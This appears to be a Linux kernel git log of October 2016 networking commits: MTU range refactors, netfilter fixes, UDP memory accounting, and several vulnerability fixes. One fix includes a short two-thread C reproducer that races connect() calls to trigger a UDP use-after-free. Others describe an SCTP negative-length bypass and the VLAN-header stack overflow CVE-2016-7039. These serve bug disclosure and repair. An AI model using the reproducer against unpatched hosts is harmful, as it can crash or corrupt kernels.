Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:16 +02:00
Liping Zhang
0ecba4d9d1 netfilter: nft_numgen: start round robin from zero
Currently we start round robin from 1, but it's better to start round
robin from 0. This is to keep consistent with xt_statistic in iptables.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:16 +02:00
Florian Westphal
5efa0fc6d7 netfilter: nf_tables: allow expressions to return STOLEN
Currently not supported, we'd oops as skb was (or is) free'd elsewhere.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:15 +02:00
Calvin Owens
0813fbc913 netfilter: nfnetlink_log: Use GFP_NOWARN for skb allocation
Since the code explicilty falls back to a smaller allocation when the
large one fails, we shouldn't complain when that happens.

Signed-off-by: Calvin Owens <calvinowens@fb.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:15 +02:00
Gao Feng
dd2602d00f netfilter: xt_multiport: Use switch case instead of multiple condition checks
There are multiple equality condition checks in the original codes, so it
is better to use switch case instead of them.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:15 +02:00
Johannes Berg
e1957dba5b cfg80211: process events caused by suspend before suspending
When suspending without WoWLAN, cfg80211 will ask drivers to
disconnect. Even when the driver does this synchronously, and
immediately returns with a notification, cfg80211 schedules
the handling thereof to a workqueue, and may then call back
into the driver when the driver was already suspended/ing.

Fix this by processing all events caused by cfg80211_leave_all()
directly after that function returns. The driver still needs to
do the right thing here and wait for the firmware response, but
that is - at least - true for mwifiex where this occurred.

Reported-by: Amitkumar Karwar <akarwar@marvell.com>
Tested-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-26 07:59:52 +02:00
Cyrill Gorcunov
432490f9d4 net: ip, diag -- Add diag interface for raw sockets
In criu we are actively using diag interface to collect sockets
present in the system when dumping applications. And while for
unix, tcp, udp[lite], packet, netlink it works as expected,
the raw sockets do not have. Thus add it.

v2:
 - add missing sock_put calls in raw_diag_dump_one (by eric.dumazet@)
 - implement @destroy for diag requests (by dsa@)

v3:
 - add export of raw_abort for IPv6 (by dsa@)
 - pass net-admin flag into inet_sk_diag_fill due to
   changes in net-next branch (by dsa@)

v4:
 - use @pad in struct inet_diag_req_v2 for raw socket
   protocol specification: raw module carries sockets
   which may have custom protocol passed from socket()
   syscall and sole @sdiag_protocol is not enough to
   match underlied ones
 - start reporting protocol specifed in socket() call
   when sockets are raw ones for the same reason: user
   space tools like ss may parse this attribute and use
   it for socket matching

v5 (by eric.dumazet@):
 - use sock_hold in raw_sock_get instead of atomic_inc,
   we're holding (raw_v4_hashinfo|raw_v6_hashinfo)->lock
   when looking up so counter won't be zero here.

v6:
 - use sdiag_raw_protocol() helper which will access @pad
   structure used for raw sockets protocol specification:
   we can't simply rename this member without breaking uapi

v7:
 - sine sdiag_raw_protocol() helper is not suitable for
   uapi lets rather make an alias structure with proper
   names. __check_inet_diag_req_raw helper will catch
   if any of structure unintentionally changed.

CC: David S. Miller <davem@davemloft.net>
CC: Eric Dumazet <eric.dumazet@gmail.com>
CC: David Ahern <dsa@cumulusnetworks.com>
CC: Alexey Kuznetsov <kuznet@ms2.inr.ac.ru>
CC: James Morris <jmorris@namei.org>
CC: Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>
CC: Patrick McHardy <kaber@trash.net>
CC: Andrey Vagin <avagin@openvz.org>
CC: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 19:35:24 -04:00
David S. Miller
44060abe1d Merge branch 'for-upstream' of git://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth
Johan Hedberg says:

====================
pull request: bluetooth 2016-10-21

Here are some more Bluetooth fixes for the 4.9 kernel:

 - Fix to btwilink driver probe function return value
 - Power management fix to hci_bcm
 - Fix to encoding name in scan response data

Please let me know if there are any issues pulling. Thanks.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:51:38 -04:00
Thomas Graf
f76a9db351 lwt: Remove unused len field
The field is initialized by ILA and MPLS but never used. Remove it.

Signed-off-by: Thomas Graf <tgraf@suug.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:45:01 -04:00
Jiri Slaby
a4b8e71b05 net: sctp, forbid negative length
Most of getsockopt handlers in net/sctp/socket.c check len against
sizeof some structure like:
        if (len < sizeof(int))
                return -EINVAL;

On the first look, the check seems to be correct. But since len is int
and sizeof returns size_t, int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.

Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.

Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.

If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
 0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
 ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
 0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
 [<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
 [<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
 [<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
 [<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
 [<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
 [<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
 [<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
 [<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:43:15 -04:00
Jason A. Donenfeld
b678aa578c ipv6: do not increment mac header when it's unset
Otherwise we'll overflow the integer. This occurs when layer 3 tunneled
packets are handed off to the IPv6 layer.

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:38:58 -04:00
Andrey Vagin
7281a66590 net: allow to kill a task which waits net_mutex in copy_new_ns
net_mutex can be locked for a long time. It may be because many
namespaces are being destroyed or many processes decide to create
a network namespace.

Both these operations are heavy, so it is better to have an ability to
kill a process which is waiting net_mutex.

Cc: "David S. Miller" <davem@davemloft.net>
Cc: Eric W. Biederman <ebiederm@xmission.com>
Signed-off-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:33:39 -04:00
Shmulik Ladkani
d65f2fa680 net/sched: em_meta: Fix 'meta vlan' to correctly recognize zero VID frames
META_COLLECTOR int_vlan_tag() assumes that if the accel tag (vlan_tci)
is zero, then no vlan accel tag is present.

This is incorrect for zero VID vlan accel packets, making the following
match fail:
  tc filter add ... basic match 'meta(vlan mask 0xfff eq 0)' ...

Apparently 'int_vlan_tag' was implemented prior VLAN_TAG_PRESENT was
introduced in 05423b2 "vlan: allow null VLAN ID to be used"
(and at time introduced, the 'vlan_tx_tag_get' call in em_meta was not
 adapted).

Fix, testing skb_vlan_tag_present instead of testing skb_vlan_tag_get's
value.

Fixes: 05423b2413 ("vlan: allow null VLAN ID to be used")
Fixes: 1a31f2042e ("netsched: Allow meta match on vlan tag on receive")

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:31:25 -04:00
Daniel Borkmann
2d0e30c30f bpf: add helper for retrieving current numa node id
Use case is mainly for soreuseport to select sockets for the local
numa node, but since generic, lets also add this for other networking
and tracing program types.

Suggested-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:52 -04:00
Paolo Abeni
850cbaddb5 udp: use it's own memory accounting schema
Completely avoid default sock memory accounting and replace it
with udp-specific accounting.

Since the new memory accounting model encapsulates completely
the required locking, remove the socket lock on both enqueue and
dequeue, and avoid using the backlog on enqueue.

Be sure to clean-up rx queue memory on socket destruction, using
udp its own sk_destruct.

Tested using pktgen with random src port, 64 bytes packet,
wire-speed on a 10G link as sender and udp_sink as the receiver,
using an l4 tuple rxhash to stress the contention, and one or more
udp_sink instances with reuseport.

nr readers      Kpps (vanilla)  Kpps (patched)
1               170             440
3               1250            2150
6               3000            3650
9               4200            4450
12              5700            6250

v4 -> v5:
  - avoid unneeded test in first_packet_length

v3 -> v4:
  - remove useless sk_rcvqueues_full() call

v2 -> v3:
  - do not set the now unsed backlog_rcv callback

v1 -> v2:
  - add memory pressure support
  - fixed dropwatch accounting for ipv6

Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:05 -04:00
Paolo Abeni
f970bd9e3a udp: implement memory accounting helpers
Avoid using the generic helpers.
Use the receive queue spin lock to protect the memory
accounting operation, both on enqueue and on dequeue.

On dequeue perform partial memory reclaiming, trying to
leave a quantum of forward allocated memory.

On enqueue use a custom helper, to allow some optimizations:
- use a plain spin_lock() variant instead of the slightly
  costly spin_lock_irqsave(),
- avoid dst_force check, since the calling code has already
  dropped the skb dst
- avoid orphaning the skb, since skb_steal_sock() already did
  the work for us

The above needs custom memory reclaiming on shutdown, provided
by the udp_destruct_sock().

v5 -> v6:
  - don't orphan the skb on enqueue

v4 -> v5:
  - replace the mem_lock with the receive queue spin lock
  - ensure that the bh is always allowed to enqueue at least
    a skb, even if sk_rcvbuf is exceeded

v3 -> v4:
  - reworked memory accunting, simplifying the schema
  - provide an helper for both memory scheduling and enqueuing

v1 -> v2:
  - use a udp specific destrctor to perform memory reclaiming
  - remove a couple of helpers, unneeded after the above cleanup
  - do not reclaim memory on dequeue if not under memory
    pressure
  - reworked the fwd accounting schema to avoid potential
    integer overflow

Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:05 -04:00
Paolo Abeni
f8c3bf00d4 net/socket: factor out helpers for memory and queue manipulation
Basic sock operations that udp code can use with its own
memory accounting schema. No functional change is introduced
in the existing APIs.

v4 -> v5:
  - avoid whitespace changes

v2 -> v4:
  - avoid exporting __sock_enqueue_skb

v1 -> v2:
  - avoid export sock_rmem_free

Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:05 -04:00
WANG Cong
396a30cce1 ipv4: use the right lock for ping_group_range
This reverts commit a681574c99
("ipv4: disable BH in set_ping_group_range()") because we never
read ping_group_range in BH context (unlike local_port_range).

Then, since we already have a lock for ping_group_range, those
using ip_local_ports.lock for ping_group_range are clearly typos.

We might consider to share a same lock for both ping_group_range
and local_port_range w.r.t. space saving, but that should be for
net-next.

Fixes: a681574c99 ("ipv4: disable BH in set_ping_group_range()")
Fixes: ba6b918ab2 ("ping: move ping_group_range out of CONFIG_SYSCTL")
Cc: Eric Dumazet <edumazet@google.com>
Cc: Eric Salo <salo@google.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 16:23:12 -04:00
Paul Moore
2a73306b60 netns: revert "netns: avoid disabling irq for netns id"
This reverts commit bc51dddf98 ("netns: avoid disabling irq for
netns id") as it was found to cause problems with systems running
SELinux/audit, see the mailing list thread below:

 * http://marc.info/?t=147694653900002&r=1&w=2

Eventually we should be able to reintroduce this code once we have
rewritten the audit multicast code to queue messages much the same
way we do for unicast messages.  A tracking issue for this can be
found below:

 * https://github.com/linux-audit/audit-kernel/issues/23

Reported-by: Stephen Smalley <sds@tycho.nsa.gov>
Reported-by: Elad Raz <e@eladraz.com>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Paul Moore <paul@paul-moore.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 16:16:29 -04:00
Jarod Wilson
8b1efc0f83 net: remove MTU limits on a few ether_setup callers
These few drivers call ether_setup(), but have no ndo_change_mtu, and thus
were overlooked for changes to MTU range checking behavior. They
previously had no range checks, so for feature-parity, set their min_mtu
to 0 and max_mtu to ETH_MAX_MTU (65535), instead of the 68 and 1500
inherited from the ether_setup() changes. Fine-tuning can come after we get
back to full feature-parity here.

CC: netdev@vger.kernel.org
Reported-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
CC: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
CC: R Parameswaran <parameswaran.r7@gmail.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-21 13:57:50 -04:00
WANG Cong
8651be8f14 ipv6: fix a potential deadlock in do_ipv6_setsockopt()
Baozeng reported this deadlock case:

       CPU0                    CPU1
       ----                    ----
  lock([  165.136033] sk_lock-AF_INET6);
                               lock([  165.136033] rtnl_mutex);
                               lock([  165.136033] sk_lock-AF_INET6);
  lock([  165.136033] rtnl_mutex);

Similar to commit 87e9f03159
("ipv4: fix a potential deadlock in mcast getsockopt() path")
this is due to we still have a case, ipv6_sock_mc_close(),
where we acquire sk_lock before rtnl_lock. Close this deadlock
with the similar solution, that is always acquire rtnl lock first.

Fixes: baf606d9c9 ("ipv4,ipv6: grab rtnl before locking the socket")
Reported-by: Baozeng Ding <sploving1@gmail.com>
Tested-by: Baozeng Ding <sploving1@gmail.com>
Cc: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Reviewed-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-21 11:29:02 -04:00
David S. Miller
8dbad1a811 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf
Pablo Neira Ayuso says:

====================
Netfilter fixes for net

The following patchset contains Netfilter fixes for your net tree,
they are:

1) Fix compilation warning in xt_hashlimit on m68k 32-bits, from
   Geert Uytterhoeven.

2) Fix wrong timeout in set elements added from packet path via
   nft_dynset, from Anders K. Pedersen.

3) Remove obsolete nf_conntrack_events_retry_timeout sysctl
   documentation, from Nicolas Dichtel.

4) Ensure proper initialization of log flags via xt_LOG, from
   Liping Zhang.

5) Missing alias to autoload ipcomp, also from Liping Zhang.

6) Missing NFTA_HASH_OFFSET attribute validation, again from Liping.

7) Wrong integer type in the new nft_parse_u32_check() function,
   from Dan Carpenter.

8) Another wrong integer type declaration in nft_exthdr_init, also
   from Dan Carpenter.

9) Fix insufficient mode validation in nft_range.

10) Fix compilation warning in nft_range due to possible uninitialized
    value, from Arnd Bergmann.

11) Zero nf_hook_ops allocated via xt_hook_alloc() in x_tables to
    calm down kmemcheck, from Florian Westphal.

12) Schedule gc_worker() to run again if GC_MAX_EVICTS quota is reached,
    from Nicolas Dichtel.

13) Fix nf_queue() after conversion to single-linked hook list, related
    to incorrect bypass flag handling and incorrect hook point of
    reinjection.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-21 10:25:22 -04:00
Linus Lüssing
9799c50372 batman-adv: fix splat on disabling an interface
As long as there is still a reference for a hard interface held, there might
still be a forwarding packet relying on its attributes.

Therefore avoid setting hard_iface->soft_iface to NULL when disabling a hard
interface.

This fixes the following, potential splat:

    batman_adv: bat0: Interface deactivated: eth1
    batman_adv: bat0: Removing interface: eth1
    cgroup: new mount options do not match the existing superblock, will be ignored
    batman_adv: bat0: Interface deactivated: eth3
    batman_adv: bat0: Removing interface: eth3
    ------------[ cut here ]------------
    WARNING: CPU: 3 PID: 1986 at ./net/batman-adv/bat_iv_ogm.c:549 batadv_iv_send_outstanding_bat_ogm_packet+0x145/0x643 [batman_adv]
    Modules linked in: batman_adv(O-) <...>
    CPU: 3 PID: 1986 Comm: kworker/u8:2 Tainted: G        W  O    4.6.0-rc6+ #1
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
    Workqueue: bat_events batadv_iv_send_outstanding_bat_ogm_packet [batman_adv]
     0000000000000000 ffff88001d93bca0 ffffffff8126c26b 0000000000000000
     0000000000000000 ffff88001d93bcf0 ffffffff81051615 ffff88001f19f818
     000002251d93bd68 0000000000000046 ffff88001dc04a00 ffff88001becbe48
    Call Trace:
     [<ffffffff8126c26b>] dump_stack+0x67/0x90
     [<ffffffff81051615>] __warn+0xc7/0xe5
     [<ffffffff8105164b>] warn_slowpath_null+0x18/0x1a
     [<ffffffffa0356f24>] batadv_iv_send_outstanding_bat_ogm_packet+0x145/0x643 [batman_adv]
     [<ffffffff8108b01f>] ? __lock_is_held+0x32/0x54
     [<ffffffff810689a2>] process_one_work+0x2a8/0x4f5
     [<ffffffff81068856>] ? process_one_work+0x15c/0x4f5
     [<ffffffff81068df2>] worker_thread+0x1d5/0x2c0
     [<ffffffff81068c1d>] ? process_scheduled_works+0x2e/0x2e
     [<ffffffff81068c1d>] ? process_scheduled_works+0x2e/0x2e
     [<ffffffff8106dd90>] kthread+0xc0/0xc8
     [<ffffffff8144de82>] ret_from_fork+0x22/0x40
     [<ffffffff8106dcd0>] ? __init_kthread_worker+0x55/0x55
    ---[ end trace 647f9f325123dc05 ]---

What happened here is, that there was still a forw_packet (here: a BATMAN IV
OGM) in the queue of eth3 with the forw_packet->if_incoming set to eth1 and the
forw_packet->if_outgoing set to eth3.

When eth3 is to be deactivated and removed, then this thread waits for the
forw_packet queued on eth3 to finish. Because eth1 was deactivated and removed
earlier and by that had forw_packet->if_incoming->soft_iface, set to NULL, the
splat when trying to send/flush the OGM on eth3 occures.

Fixes: c6c8fea297 ("net: Add batman-adv meshing protocol")
Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
[sven@narfation.org: Reduced size of Oops message]
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-21 14:47:02 +02:00
Jarod Wilson
b96f9afee4 ipv4/6: use core net MTU range checking
ipv4/ip_tunnel:
- min_mtu = 68, max_mtu = 0xFFF8 - dev->hard_header_len - t_hlen
- preserve all ndo_change_mtu checks for now to prevent regressions

ipv6/ip6_tunnel:
- min_mtu = 68, max_mtu = 0xFFF8 - dev->hard_header_len
- preserve all ndo_change_mtu checks for now to prevent regressions

ipv6/ip6_vti:
- min_mtu = 1280, max_mtu = 65535
- remove redundant vti6_change_mtu

ipv6/sit:
- min_mtu = 1280, max_mtu = 0xFFF8 - t_hlen
- remove redundant ipip6_tunnel_change_mtu

CC: netdev@vger.kernel.org
CC: "David S. Miller" <davem@davemloft.net>
CC: Alexey Kuznetsov <kuznet@ms2.inr.ac.ru>
CC: James Morris <jmorris@namei.org>
CC: Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>
CC: Patrick McHardy <kaber@trash.net>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:10 -04:00
Jarod Wilson
b3e3893e12 net: use core MTU range checking in misc drivers
firewire-net:
- set min/max_mtu
- remove fwnet_change_mtu

nes:
- set max_mtu
- clean up nes_netdev_change_mtu

xpnet:
- set min/max_mtu
- remove xpnet_dev_change_mtu

hippi:
- set min/max_mtu
- remove hippi_change_mtu

batman-adv:
- set max_mtu
- remove batadv_interface_change_mtu
- initialization is a little async, not 100% certain that max_mtu is set
  in the optimal place, don't have hardware to test with

rionet:
- set min/max_mtu
- remove rionet_change_mtu

slip:
- set min/max_mtu
- streamline sl_change_mtu

um/net_kern:
- remove pointless ndo_change_mtu

hsi/clients/ssi_protocol:
- use core MTU range checking
- remove now redundant ssip_pn_set_mtu

ipoib:
- set a default max MTU value
- Note: ipoib's actual max MTU can vary, depending on if the device is in
  connected mode or not, so we'll just set the max_mtu value to the max
  possible, and let the ndo_change_mtu function continue to validate any new
  MTU change requests with checks for CM or not. Note that ipoib has no
  min_mtu set, and thus, the network core's mtu > 0 check is the only lower
  bounds here.

mptlan:
- use net core MTU range checking
- remove now redundant mpt_lan_change_mtu

fddi:
- min_mtu = 21, max_mtu = 4470
- remove now redundant fddi_change_mtu (including export)

fjes:
- min_mtu = 8192, max_mtu = 65536
- The max_mtu value is actually one over IP_MAX_MTU here, but the idea is to
  get past the core net MTU range checks so fjes_change_mtu can validate a
  new MTU against what it supports (see fjes_support_mtu in fjes_hw.c)

hsr:
- min_mtu = 0 (calls ether_setup, max_mtu is 1500)

f_phonet:
- min_mtu = 6, max_mtu = 65541

u_ether:
- min_mtu = 14, max_mtu = 15412

phonet/pep-gprs:
- min_mtu = 576, max_mtu = 65530
- remove redundant gprs_set_mtu

CC: netdev@vger.kernel.org
CC: linux-rdma@vger.kernel.org
CC: Stefan Richter <stefanr@s5r6.in-berlin.de>
CC: Faisal Latif <faisal.latif@intel.com>
CC: linux-rdma@vger.kernel.org
CC: Cliff Whickman <cpw@sgi.com>
CC: Robin Holt <robinmholt@gmail.com>
CC: Jes Sorensen <jes@trained-monkey.org>
CC: Marek Lindner <mareklindner@neomailbox.ch>
CC: Simon Wunderlich <sw@simonwunderlich.de>
CC: Antonio Quartulli <a@unstable.cc>
CC: Sathya Prakash <sathya.prakash@broadcom.com>
CC: Chaitra P B <chaitra.basappa@broadcom.com>
CC: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
CC: MPT-FusionLinux.pdl@broadcom.com
CC: Sebastian Reichel <sre@kernel.org>
CC: Felipe Balbi <balbi@kernel.org>
CC: Arvid Brodin <arvid.brodin@alten.se>
CC: Remi Denis-Courmont <courmisch@gmail.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:10 -04:00
Jarod Wilson
91572088e3 net: use core MTU range checking in core net infra
geneve:
- Merge __geneve_change_mtu back into geneve_change_mtu, set max_mtu
- This one isn't quite as straight-forward as others, could use some
  closer inspection and testing

macvlan:
- set min/max_mtu

tun:
- set min/max_mtu, remove tun_net_change_mtu

vxlan:
- Merge __vxlan_change_mtu back into vxlan_change_mtu
- Set max_mtu to IP_MAX_MTU and retain dynamic MTU range checks in
  change_mtu function
- This one is also not as straight-forward and could use closer inspection
  and testing from vxlan folks

bridge:
- set max_mtu of IP_MAX_MTU and retain dynamic MTU range checks in
  change_mtu function

openvswitch:
- set min/max_mtu, remove internal_dev_change_mtu
- note: max_mtu wasn't checked previously, it's been set to 65535, which
  is the largest possible size supported

sch_teql:
- set min/max_mtu (note: max_mtu previously unchecked, used max of 65535)

macsec:
- min_mtu = 0, max_mtu = 65535

macvlan:
- min_mtu = 0, max_mtu = 65535

ntb_netdev:
- min_mtu = 0, max_mtu = 65535

veth:
- min_mtu = 68, max_mtu = 65535

8021q:
- min_mtu = 0, max_mtu = 65535

CC: netdev@vger.kernel.org
CC: Nicolas Dichtel <nicolas.dichtel@6wind.com>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Tom Herbert <tom@herbertland.com>
CC: Daniel Borkmann <daniel@iogearbox.net>
CC: Alexander Duyck <alexander.h.duyck@intel.com>
CC: Paolo Abeni <pabeni@redhat.com>
CC: Jiri Benc <jbenc@redhat.com>
CC: WANG Cong <xiyou.wangcong@gmail.com>
CC: Roopa Prabhu <roopa@cumulusnetworks.com>
CC: Pravin B Shelar <pshelar@ovn.org>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Patrick McHardy <kaber@trash.net>
CC: Stephen Hemminger <stephen@networkplumber.org>
CC: Pravin Shelar <pshelar@nicira.com>
CC: Maxim Krasnyansky <maxk@qti.qualcomm.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:09 -04:00
Jarod Wilson
8b6b4135e4 net: use core MTU range checking in WAN drivers
- set min/max_mtu in all hdlc drivers, remove hdlc_change_mtu
- sent max_mtu in lec driver, remove lec_change_mtu
- set min/max_mtu in x25_asy driver

CC: netdev@vger.kernel.org
CC: Krzysztof Halasa <khc@pm.waw.pl>
CC: Krzysztof Halasa <khalasa@piap.pl>
CC: Jan "Yenya" Kasprzak <kas@fi.muni.cz>
CC: Francois Romieu <romieu@fr.zoreil.com>
CC: Kevin Curtis <kevin.curtis@farsite.co.uk>
CC: Zhao Qiang <qiang.zhao@nxp.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:09 -04:00
Jarod Wilson
9c22b4a34e net: use core MTU range checking in wireless drivers
- set max_mtu in wil6210 driver
- set max_mtu in atmel driver
- set min/max_mtu in cisco airo driver, remove airo_change_mtu
- set min/max_mtu in ipw2100/ipw2200 drivers, remove libipw_change_mtu
- set min/max_mtu in p80211netdev, remove wlan_change_mtu
- set min/max_mtu in net/mac80211/iface.c and remove ieee80211_change_mtu
- set min/max_mtu in wimax/i2400m and remove i2400m_change_mtu
- set min/max_mtu in intersil/hostap and remove prism2_change_mtu
- set min/max_mtu in intersil/orinoco
- set min/max_mtu in tty/n_gsm and remove gsm_change_mtu

CC: netdev@vger.kernel.org
CC: linux-wireless@vger.kernel.org
CC: Maya Erez <qca_merez@qca.qualcomm.com>
CC: Simon Kelley <simon@thekelleys.org.uk>
CC: Stanislav Yakovlev <stas.yakovlev@gmail.com>
CC: Johannes Berg <johannes@sipsolutions.net>
CC: Inaky Perez-Gonzalez <inaky.perez-gonzalez@intel.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Acked-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:08 -04:00
Eric Dumazet
a681574c99 ipv4: disable BH in set_ping_group_range()
In commit 4ee3bd4a8c ("ipv4: disable BH when changing ip local port
range") Cong added BH protection in set_local_port_range() but missed
that same fix was needed in set_ping_group_range()

Fixes: b8f1a55639 ("udp: Add function to make source port for UDP tunnels")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Eric Salo <salo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:49:32 -04:00
Eric Dumazet
286c72deab udp: must lock the socket in udp_disconnect()
Baozeng Ding reported KASAN traces showing uses after free in
udp_lib_get_port() and other related UDP functions.

A CONFIG_DEBUG_PAGEALLOC=y kernel would eventually crash.

I could write a reproducer with two threads doing :

static int sock_fd;
static void *thr1(void *arg)
{
	for (;;) {
		connect(sock_fd, (const struct sockaddr *)arg,
			sizeof(struct sockaddr_in));
	}
}

static void *thr2(void *arg)
{
	struct sockaddr_in unspec;

	for (;;) {
		memset(&unspec, 0, sizeof(unspec));
	        connect(sock_fd, (const struct sockaddr *)&unspec,
			sizeof(unspec));
        }
}

Problem is that udp_disconnect() could run without holding socket lock,
and this was causing list corruptions.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Baozeng Ding <sploving1@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:45:52 -04:00
Sabrina Dubroca
fcd91dd449 net: add recursion limit to GRO
Currently, GRO can do unlimited recursion through the gro_receive
handlers.  This was fixed for tunneling protocols by limiting tunnel GRO
to one level with encap_mark, but both VLAN and TEB still have this
problem.  Thus, the kernel is vulnerable to a stack overflow, if we
receive a packet composed entirely of VLAN headers.

This patch adds a recursion counter to the GRO layer to prevent stack
overflow.  When a gro_receive function hits the recursion limit, GRO is
aborted for this skb and it is processed normally.  This recursion
counter is put in the GRO CB, but could be turned into a percpu counter
if we run out of space in the CB.

Thanks to Vladimír Beneš <vbenes@redhat.com> for the initial bug report.

Fixes: CVE-2016-7039
Fixes: 9b174d88c2 ("net: Add Transparent Ethernet Bridging GRO support.")
Fixes: 66e5133f19 ("vlan: Add GRO support for non hardware accelerated vlan")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
